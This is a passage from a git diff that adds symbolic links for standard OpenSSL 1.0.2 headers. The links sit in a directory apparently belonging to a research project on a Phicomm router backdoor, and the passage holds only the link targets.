@@ -0,0 +1 @@
+../../crypto/bio/bio.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/blowfish.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/blowfish.h
new file mode 120000
index 0000000..88bf922
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/blowfish.h
@@ -0,0 +1 @@
+../../crypto/bf/blowfish.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bn.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bn.h
new file mode 120000
index 0000000..5c251c1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/bn.h
@@ -0,0 +1 @@
+../../crypto/bn/bn.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/buffer.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/buffer.h
new file mode 120000
index 0000000..76ea711
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/buffer.h
@@ -0,0 +1 @@
+../../crypto/buffer/buffer.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/camellia.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/camellia.h
new file mode 120000
index 0000000..ad10f97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/camellia.h
@@ -0,0 +1 @@
+../../crypto/camellia/camellia.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cast.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cast.h
new file mode 120000
index 0000000..b775ab0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cast.h
@@ -0,0 +1 @@
+../../crypto/cast/cast.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cmac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cmac.h
new file mode 120000
index 0000000..bfb70c4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cmac.h
@@ -0,0 +1 @@
+../../crypto/cmac/cmac.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cms.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cms.h
new file mode 120000
index 0000000..0f651ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/cms.h
@@ -0,0 +1 @@
+../../crypto/cms/cms.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/comp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/comp.h
new file mode 120000
index 0000000..712c9d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/comp.h
@@ -0,0 +1 @@
+../../crypto/comp/comp.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf.h
new file mode 120000
index 0000000..44156b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf.h
@@ -0,0 +1 @@
+../../crypto/conf/conf.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf_api.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf_api.h
new file mode 120000
index 0000000..26b4219
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/conf_api.h
@@ -0,0 +1 @@
+../../crypto/conf/conf_api.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/crypto.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/crypto.h
new file mode 120000
index 0000000..2f3f63c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/crypto.h
@@ -0,0 +1 @@
+../../crypto/crypto.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des.h
new file mode 120000
index 0000000..5eb7c88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des.h
@@ -0,0 +1 @@
+../../crypto/des/des.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des_old.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des_old.h
new file mode 120000
index 0000000..9709898
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/des_old.h
@@ -0,0 +1 @@
+../../crypto/des/des_old.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dh.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dh.h
new file mode 120000
index 0000000..c0eacb5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dh.h
@@ -0,0 +1 @@
+../../crypto/dh/dh.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dsa.h
new file mode 120000
index 0000000..ad4695f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dsa.h
@@ -0,0 +1 @@
+../../crypto/dsa/dsa.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dso.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dso.h
new file mode 120000
index 0000000..b1f215d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dso.h
@@ -0,0 +1 @@
+../../crypto/dso/dso.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dtls1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dtls1.h
new file mode 120000
index 0000000..95aef99
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/dtls1.h
@@ -0,0 +1 @@
+../../ssl/dtls1.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/e_os2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/e_os2.h
new file mode 120000
index 0000000..0e8c039
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/e_os2.h
@@ -0,0 +1 @@
+../../e_os2.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ebcdic.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ebcdic.h
new file mode 120000
index 0000000..a7ee60e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ebcdic.h
@@ -0,0 +1 @@
+../../crypto/ebcdic.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ec.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ec.h
new file mode 120000
index 0000000..245497e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ec.h
@@ -0,0 +1 @@
+../../crypto/ec/ec.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdh.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdh.h
new file mode 120000
index 0000000..3fd1c3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdh.h
@@ -0,0 +1 @@
+../../crypto/ecdh/ecdh.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdsa.h
new file mode 120000
index 0000000..e48acc6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ecdsa.h
@@ -0,0 +1 @@
+../../crypto/ecdsa/ecdsa.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/engine.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/engine.h
new file mode 120000
index 0000000..a02073e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/engine.h
@@ -0,0 +1 @@
+../../crypto/engine/engine.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/err.h
new file mode 120000
index 0000000..20f65bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/err.h
@@ -0,0 +1 @@
+../../crypto/err/err.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/evp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/evp.h
new file mode 120000
index 0000000..7e3a904
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/evp.h
@@ -0,0 +1 @@
+../../crypto/evp/evp.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/hmac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/hmac.h
new file mode 120000
index 0000000..de19ba7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/hmac.h
@@ -0,0 +1 @@
+../../crypto/hmac/hmac.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/idea.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/idea.h
new file mode 120000
index 0000000..724fa34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/idea.h
@@ -0,0 +1 @@
+../../crypto/idea/idea.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/krb5_asn.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/krb5_asn.h
new file mode 120000
index 0000000..1172e52
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/krb5_asn.h
@@ -0,0 +1 @@
+../../crypto/krb5/krb5_asn.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/kssl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/kssl.h
new file mode 120000
index 0000000..2e5c2cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/kssl.h
@@ -0,0 +1 @@
+../../ssl/kssl.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/lhash.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/lhash.h
new file mode 120000
index 0000000..56eb099
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/lhash.h
@@ -0,0 +1 @@
+../../crypto/lhash/lhash.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md4.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md4.h
new file mode 120000
index 0000000..4ff863e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md4.h
@@ -0,0 +1 @@
+../../crypto/md4/md4.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md5.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md5.h
new file mode 120000
index 0000000..26fa47e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/md5.h
@@ -0,0 +1 @@
+../../crypto/md5/md5.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/mdc2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/mdc2.h
new file mode 120000
index 0000000..0bc32f1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/mdc2.h
@@ -0,0 +1 @@
+../../crypto/mdc2/mdc2.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/modes.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/modes.h
new file mode 120000
index 0000000..ccc1728
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/modes.h
@@ -0,0 +1 @@
+../../crypto/modes/modes.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/obj_mac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/obj_mac.h
new file mode 120000
index 0000000..0f443c8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/obj_mac.h
@@ -0,0 +1 @@
+../../crypto/objects/obj_mac.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/objects.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/objects.h
new file mode 120000
index 0000000..7bd145c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/objects.h
@@ -0,0 +1 @@
+../../crypto/objects/objects.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ocsp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ocsp.h
new file mode 120000
index 0000000..08288c8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ocsp.h
@@ -0,0 +1 @@
+../../crypto/ocsp/ocsp.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslconf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslconf.h
new file mode 120000
index 0000000..25d2bea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslconf.h
@@ -0,0 +1 @@
+../../crypto/opensslconf.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslv.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslv.h
new file mode 120000
index 0000000..f314f5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/opensslv.h
@@ -0,0 +1 @@
+../../crypto/opensslv.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ossl_typ.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ossl_typ.h
new file mode 120000
index 0000000..e8f4245
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ossl_typ.h
@@ -0,0 +1 @@
+../../crypto/ossl_typ.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem.h
new file mode 120000
index 0000000..ca37142
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem.h
@@ -0,0 +1 @@
+../../crypto/pem/pem.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem2.h
new file mode 120000
index 0000000..c734dbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pem2.h
@@ -0,0 +1 @@
+../../crypto/pem/pem2.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs12.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs12.h
new file mode 120000
index 0000000..eebba77
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs12.h
@@ -0,0 +1 @@
+../../crypto/pkcs12/pkcs12.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs7.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs7.h
new file mode 120000
index 0000000..73e1b23
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pkcs7.h
@@ -0,0 +1 @@
+../../crypto/pkcs7/pkcs7.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pqueue.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pqueue.h
new file mode 120000
index 0000000..93817c2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/pqueue.h
@@ -0,0 +1 @@
+../../crypto/pqueue/pqueue.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rand.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rand.h
new file mode 120000
index 0000000..11231f8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rand.h
@@ -0,0 +1 @@
+../../crypto/rand/rand.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc2.h
new file mode 120000
index 0000000..bb5a05c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc2.h
@@ -0,0 +1 @@
+../../crypto/rc2/rc2.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc4.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc4.h
new file mode 120000
index 0000000..ef7deeb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rc4.h
@@ -0,0 +1 @@
+../../crypto/rc4/rc4.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ripemd.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ripemd.h
new file mode 120000
index 0000000..200f562
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ripemd.h
@@ -0,0 +1 @@
+../../crypto/ripemd/ripemd.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rsa.h
new file mode 120000
index 0000000..3e5a654
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/rsa.h
@@ -0,0 +1 @@
+../../crypto/rsa/rsa.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/safestack.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/safestack.h
new file mode 120000
index 0000000..8ca5b4c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/safestack.h
@@ -0,0 +1 @@
+../../crypto/stack/safestack.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/seed.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/seed.h
new file mode 120000
index 0000000..05d04a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/seed.h
@@ -0,0 +1 @@
+../../crypto/seed/seed.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/sha.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/sha.h
new file mode 120000
index 0000000..3025cd5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/sha.h
@@ -0,0 +1 @@
+../../crypto/sha/sha.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srp.h
new file mode 120000
index 0000000..16b73eb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srp.h
@@ -0,0 +1 @@
+../../crypto/srp/srp.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srtp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srtp.h
new file mode 120000
index 0000000..9800e4e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/srtp.h
@@ -0,0 +1 @@
+../../ssl/srtp.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl.h
new file mode 120000
index 0000000..e87d9be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl.h
@@ -0,0 +1 @@
+../../ssl/ssl.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl2.h
new file mode 120000
index 0000000..7287688
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl2.h
@@ -0,0 +1 @@
+../../ssl/ssl2.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl23.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl23.h
new file mode 120000
index 0000000..5605052
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl23.h
@@ -0,0 +1 @@
+../../ssl/ssl23.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl3.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl3.h
new file mode 120000
index 0000000..5ae2507
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ssl3.h
@@ -0,0 +1 @@
+../../ssl/ssl3.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/stack.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/stack.h
new file mode 120000
index 0000000..61d342f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/stack.h
@@ -0,0 +1 @@
+../../crypto/stack/stack.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/symhacks.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/symhacks.h
new file mode 120000
index 0000000..4a1a691
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/symhacks.h
@@ -0,0 +1 @@
+../../crypto/symhacks.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/tls1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/tls1.h
new file mode 120000
index 0000000..53d998f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/tls1.h
@@ -0,0 +1 @@
+../../ssl/tls1.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ts.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ts.h
new file mode 120000
index 0000000..a75d99d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ts.h
@@ -0,0 +1 @@
+../../crypto/ts/ts.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/txt_db.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/txt_db.h
new file mode 120000
index 0000000..f672e35
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/txt_db.h
@@ -0,0 +1 @@
+../../crypto/txt_db/txt_db.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui.h
new file mode 120000
index 0000000..b07defa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui.h
@@ -0,0 +1 @@
+../../crypto/ui/ui.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui_compat.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui_compat.h
new file mode 120000
index 0000000..d8c74b7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/ui_compat.h
@@ -0,0 +1 @@
+../../crypto/ui/ui_compat.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/whrlpool.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/whrlpool.h
new file mode 120000
index 0000000..125a081
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/whrlpool.h
@@ -0,0 +1 @@
+../../crypto/whrlpool/whrlpool.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509.h
new file mode 120000
index 0000000..b2b85c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509.h
@@ -0,0 +1 @@
+../../crypto/x509/x509.h
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509_vfy.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/include/openssl/x509_vfy.h
new file mode 120000
index 0000000..bb99ad4
